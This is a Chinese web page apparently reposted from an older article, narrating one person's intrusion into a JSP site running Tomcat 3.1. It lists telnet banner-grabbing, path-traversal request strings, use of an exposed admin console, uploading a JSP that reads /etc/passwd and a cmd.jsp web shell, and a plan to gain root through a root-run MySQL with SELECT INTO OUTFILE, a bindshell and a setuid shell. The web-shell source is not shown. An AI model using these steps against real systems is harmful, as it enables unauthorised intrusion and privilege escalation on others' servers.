济宁天气预报
济宁市人力资源和社会保障局
济宁人事考试单位代码
济宁市安全教育平台
济宁违章查询
济宁住房公积金查询
济宁科技网 济宁培训班 济宁银行网上银行 济宁教育网 历史故事 家庭教育 济宁市地图 济宁房产 济宁教育网 济宁人事考试信息网 济宁新闻网
币圈最新消息 济宁信息港
浏览器之家 济宁汽车 睡前小故事
下载吧 股票书籍 花花草草
百应百科 照片恢复 学习通
红警之家 睡前小故事 马伊琍
手机照片恢复 手机数据恢复

黑客攻击技术 WEB网站入侵的全过程讲述

时间:2010-09-09 18:31来源:未知 www.yunhepan.com

以下的文章主要向大家讲述的是黑客攻击技术WEB网站入侵的过程,很偶然的一个机会,看到了一个网站,页面清新也很舒服的感觉。网站是用JSP开发的,由于个人的喜好,所以我决定看看系统的安全性。

  1. telnetwww.target.com8080 GET/CHINANSLHTTP/1.1
  2. [Enter] [Enter]
  3. 返回的结果如下: HTTP/1.0404NotFound
  4. Date:Sun,08Jul200107:49:13GMT Servlet-Engine:TomcatWebServer/3.1(JSP1.1;Servlet2.2;Java1.2.2;Linux2
  5. .2.12i386;java.vendor=BlackdownJava-LinuxTeam) Content-Language:en
  6. Content-Type:text/html Status:404
  7. Error:404 Location:/CHINANSLFileNotFound/CHINANSL

我获得了运行的WEBServer的名称"Tomcat 3.1"。我记得我曾经发现过这个版本的漏洞,并且post到bugtrap上去过。大概是:通过".."技术可以退出WEB目录,于是:

  1. http://target:8080/../../../../%00.jsp(不行) http://target:8080/file/index.jsp(不行)
  2. http://target:8080/index.JSP(不行) http://target:8080/index.jsp%81(不行)
  3. http://target:8080/index.js%70(不行) http://target:8080/index.jsp%2581(不行)
  4. http://target:8080/WEB-INF/(不行)

嗯,在试试吧!Tomcat 3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context.试一下:http://target:8080/admin/ ,管理员果然没有删除或禁止访问这个目录。接着我点"VIEW ALL CONTEXT"按钮,列出了WEB目录下的一些文件和目录的名称,我开始仔细的看了起来,一小会儿,发现了一个上传文件的组件,嘿嘿,写一个jsp文件弄上去看看。几口咖啡的时间,我写了这么一个东东出来:

通过上传的组件将这个jsp上传到对方的WEB目录里,然后:

http://target:8080/upload/test.jsp?file=/etc/passwd

嘿嘿,密码出来啦。我只看了"/etc/passwd",并没有看"/etc/shadow",因为当时考虑webserver一般使用nobody的身份启动的,看了也白看。(失误)接下来的过程是无聊的猜测密码,没有成功。算了,那我只有将就点,反正现在我相当于有了一个shell了嘛,猜不出密码上去,那就全当IE是我的SHELL环境吧!

再写:

然后把这个jsp又通过upload上传了上去,嘿嘿,我现在有个SHELL了。

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/

(我这里就不列出来了)

怎么获得root呢?经过一番搜索我发现了系统安装了mysql并且我从jsp的源代码中得到了mysql的密码:)看看是什么权限运行的mysql:

  1. sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+ grep+mysqld

显示:

  1. root874940.21.9173004800p0-S28Jun015:54.72/usr/local/data/mysql

嘿嘿,有办法了,系统是以root身份运行的mysql,同时我知道了mysql的密码,那我现在我可以写一个shell程序,让它create一个表,然后将我的数据放到表中,然后再使用"select ... into outfile;"的办法在系统上创建一个文件,让用户在执行su的时候,运行我的程序。(还记得apache.org有一次被WEB网站入侵吗?hacker就采用的这种办法)。

然后,我再上传bindshell之类的程序,运行、获得nobody的权限,然后......再使用su root时帮忙创建的setuid shell让自己成为root.嘿嘿,真是好办法,我都为我的想法感到得意......

相关阅读
  • 调查显示大企业中只有33%未被黑客入侵
  • 简述主要的黑客入侵途径及应对方法
  • 通过交换机防范蠕虫病毒入侵
  • 黑客攻击和入侵的八大常用手段有哪些?
  • 黑客捕捉技术之网络入侵追踪方法
  • SQL注入网站入侵实例演示
  • 实例讲述网络社会工程学
  • 黑客入侵也无间 盗走网吧20万

  • 上一篇:手动防御传奇攻击问题
    下一篇:闪存驱动器攻击介质仍受黑客青睐

    济宁运河畔网版权与免责声明:

    ①凡本网来源于注明来“源于:运河畔或www.yunhepan.com”版权均属运河畔网所有,其他媒体可以转载,且需注明“来源运河畔网”
    ② 凡本网注明“来源:XXX(非济宁运河畔,济宁信息港)”的作品,均转载自其它媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
    ③ 如因作品内容、版权和其它问题需要同本网联系的,请在30日内进行。

    • 全网热点
    • 健康
    • 教育
    • 新闻
    • 美食